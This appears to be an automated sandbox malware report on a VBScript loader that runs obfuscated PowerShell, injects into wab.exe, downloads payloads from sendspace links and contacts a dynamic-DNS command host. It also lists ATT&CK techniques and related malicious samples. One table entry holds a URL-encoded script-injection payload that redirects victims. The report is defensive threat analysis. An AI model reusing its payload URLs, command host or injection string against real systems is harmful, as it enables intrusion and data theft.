,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: wab.exe, 00000011.00000002.2582688527.00000000062B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 8060, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 8060, type: MEMORYSTR
Mitre Att&ck Matrix (techniques listed per tactic; numbers preceding a technique are the report's match-count badges, kept as extracted)

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
• Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
• Execution: 11 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers
• Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
• Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
• Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 111 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
• Discovery: 31 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 14 System Information Discovery; Remote System Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
• Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
• Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1446635 | Sample: windows.vbs | Start date: 23/05/2024 | Architecture: WINDOWS | Score: 100

Sample-level DNS/IP: rachesxwdavid.duckdns.org (signature: Uses dynamic DNS services); www.sendspace.com; 2 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

Process tree (numbers after a process name are the graph's badges, kept as extracted):
• wscript.exe 1 (started by the sample)
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
  • powershell.exe 14 19 (started by wscript.exe)
    DNS/IP: fs03n1.sendspace.com 69.31.136.17, 443, 49707, GTT-BACKBONEGTTDE, United States; www.sendspace.com 172.67.170.105, 443, 49706, 49710, CLOUDFLARENETUS, United States
    Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
    • powershell.exe 17 (started by powershell.exe)
      Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
      • wab.exe 14 (started by powershell.exe)
        DNS/IP: rachesxwdavid.duckdns.org 57.128.155.22, 49713, 8895, ATGS-MMD-ASUS, Belgium; fs13n5.sendspace.com 69.31.136.57, 443, 49711, GTT-BACKBONEGTTDE, United States
      • cmd.exe 1 (started by powershell.exe)
    • conhost.exe (started by powershell.exe)
    • cmd.exe 1 (started by powershell.exe)

Source | Detection | Scanner | Label
windows.vbs | 8% | ReversingLabs | Win32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://crl.m | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://fs13n5.sendspace.com/Ezo8 | 0% | Avira URL Cloud | safe
http://fs03n1.sendspace.com | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/tbfvpdXR | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/dy1f16 | 0% | Avira URL Cloud | safe
https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.com | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/tbfvpd | 0% | Avira URL Cloud | safe
http://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs13n5.sendspace.com/yz | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.comx | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/tbfvpdP | 0% | Avira URL Cloud | safe
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe
rachesxwdavid.duckdns.org | 100% | Avira URL Cloud | malware
https://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java | 0% | Avira URL Cloud | safe
https://fs13n5.sendspace.com/om:443t | 0% | Avira URL Cloud | safe
https://fs13n5.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/dy1f16/u28 | 0% | Avira URL Cloud | safe
https://fs03n1.sendspaX | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sendspace.com | 172.67.170.105 | true | false | (none) | unknown
fs03n1.sendspace.com | 69.31.136.17 | true | false | (none) | unknown
fs13n5.sendspace.com | 69.31.136.57 | true | false | (none) | unknown
rachesxwdavid.duckdns.org | 57.128.155.22 | true | true | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.sendspace.com/pro/dl/dy1f16 | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/tbfvpd | false | Avira URL Cloud: safe | unknown
https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin | false | Avira URL Cloud: safe | unknown
rachesxwdavid.duckdns.org | true | Avira URL Cloud: malware | unknown
https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n5.sendspace.com/Ezo8 | wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n1.sendspace.com | powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/tbfvpdXR | powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000009.00000002.1912177554.0000012C8154F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n5.sendspace.com/yz | wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n1.sendspace.comx | powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs03n1.sendspace.com | powershell.exe, 00000009.00000002.1912177554.0000012C82226000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sendspace.com | powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000009.00000002.1912177554.0000012C8203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 0000000D.00000002.1845952673.000000000706B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/tbfvpdP | powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n5.sendspace.com/om:443t | wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/dy1f16/u28 | wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n1.sendspaX | powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n5.sendspace.com/ | wab.exe, 00000011.00000003.1839864776.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
57.128.155.22 | rachesxwdavid.duckdns.org | Belgium | 2686 | ATGS-MMD-ASUS | true
69.31.136.17 | fs03n1.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
172.67.170.105 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.57 | fs13n5.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446635
Start date and time: 2024-05-23 18:24:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: windows.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@12/7@4/4
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 78
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7588 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: windows.vbs
Time | Type | Description
12:25:08 | API Interceptor | 17384x Sleep call for process: powershell.exe modified
12:25:58 | API Interceptor | 349940x Sleep call for process: wab.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name
57.128.155.22 | fresh_shrunk.exe | malicious | XWorm
57.128.155.22 | 8QpxBYQvg1.exe | malicious | PureLog Stealer
57.128.155.22 | file.exe | malicious | Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz
57.128.155.22 | file.exe | malicious | Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz
57.128.155.22 | file.exe | malicious | RedLine
57.128.155.22 | CHZlSQKW3X.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT
57.128.155.22 | IkYqsQV4ty.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz
57.128.155.22 | 51lz9Xlo4S.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz
57.128.155.22 | AkJ6Em8xAv.exe | malicious | Glupteba, LummaC Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT
57.128.155.22 | vxBrm6K24y.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT
69.31.136.17 | update.vbs | malicious | GuLoader
69.31.136.17 | DOCUMENTS.exe.html | malicious | Unknown
69.31.136.17 | JAN_YDHM007390.vbs | malicious | Unknown
69.31.136.17 | UGH82MSGHWUSHSDHWQOL.vbs | malicious | Unknown
69.31.136.17 | 1st_Payment.vbs | malicious | Revenge
172.67.170.105 | time.vbs | malicious | GuLoader
172.67.170.105 | file300un.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar
69.31.136.57 | update.vbs | malicious | GuLoader
69.31.136.57 | time.vbs | malicious | GuLoader
69.31.136.57 | https://www.sendspace.com/file/dwfkjz | malicious | FormBook
69.31.136.57 | #W002UHNSOP.vbs | malicious | Unknown
69.31.136.57 | 1st_Payment_Copy.vbs | malicious | Unknown
69.31.136.57 | 1st_Payment.vbs | malicious | Revenge
69.31.136.57 | QWMSA_Payment_Invoice0939.vbs | malicious | Quasar
69.31.136.57 | QA6433_#002.vbs | malicious | njRat
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
www.sendspace.com | time.vbs | malicious | GuLoader | 172.67.170.105
www.sendspace.com | https://www.sendspace.com/pro/dl/hg4kq5 | malicious | Unknown | 172.64.104.11
www.sendspace.com | RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.html | malicious | Unknown | 172.67.161.115
www.sendspace.com | https://www.sendspace.com/file/dwfkjz | malicious | FormBook | 104.21.91.185
www.sendspace.com | DOCUMENTS.exe.html | malicious | Unknown | 172.64.202.8
www.sendspace.com | SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exe | malicious | GuLoader | 172.64.108.22
www.sendspace.com | RdMr3o5vB2.exe | malicious | CryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, Socelars | 172.67.141.102
www.sendspace.com | New Order.exe | malicious | Oski Stealer Vidar | 172.67.141.102
www.sendspace.com | QzvyuYJlDX.exe | malicious | Unknown | 104.21.41.17
www.sendspace.com | XZ22CfAOCN.exe | malicious | RedLine SmokeLoader Tofsee Vidar | 172.64.173.34
fs13n5.sendspace.com | 1st_Payment.vbs | malicious | Revenge | 69.31.136.57
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
CLOUDFLARENETUS | update.vbs | malicious | GuLoader | 104.21.28.80
CLOUDFLARENETUS | time.vbs | malicious | GuLoader | 172.67.170.105
CLOUDFLARENETUS | windows.vbs | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621 | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | ELECTRONIC RECEIPT_Europait.html | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | 30% Down Payment Slip.pdf_______________________________________________________.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | ordinul de cotatie.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni | malicious | Unknown | 104.18.138.17
CLOUDFLARENETUS | PI_230524.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
ATGS-MMD-ASUS | Clear.7z | malicious | Unknown | 34.160.144.191
ATGS-MMD-ASUS | http://info.ipreo.com/Privacy-Policy.html | malicious | Unknown | 34.149.2.41
ATGS-MMD-ASUS | AsrP4dFOgM.elf | malicious | Mirai, Moobot | 48.57.70.11
ATGS-MMD-ASUS | gJlGkncVHO.elf | malicious | Mirai, Moobot | 57.208.217.43
ATGS-MMD-ASUS | gm7Kudjyws.elf | malicious | Gafgyt | 57.56.43.154
ATGS-MMD-ASUS | https://miempresaessaludable.theobjective.com | malicious | Unknown | 57.128.96.202
ATGS-MMD-ASUS | 6uBxa0vGQt.elf | malicious | Gafgyt | 33.90.14.151
ATGS-MMD-ASUS | n8RoxsQ4om.elf | malicious | Mirai | 57.141.231.20
                                                                        Xi102MnZby.elfGet hashmaliciousMiraiBrowse
                                                                        • 48.85.179.246
                                                                        TYxryaQOKO.elfGet hashmaliciousMiraiBrowse
                                                                        • 48.178.171.26
                                                                        GTT-BACKBONEGTTDEupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.57
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.53
                                                                        http://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                                        • 69.167.127.106
                                                                        http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                                        • 69.167.127.106
                                                                        la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 69.31.5.255
                                                                        TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                                                        • 208.97.218.33
                                                                        81#Uff09.exeGet hashmaliciousUnknownBrowse
                                                                        • 23.62.176.141
                                                                        YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                                                        • 212.222.82.254
                                                                        M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                                                        • 74.199.145.209
                                                                        kuzen.vbsGet hashmaliciousUnknownBrowse
                                                                        • 23.62.176.141
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        windows.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        https://mydhl.express.dhl$tracking_link/Get hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
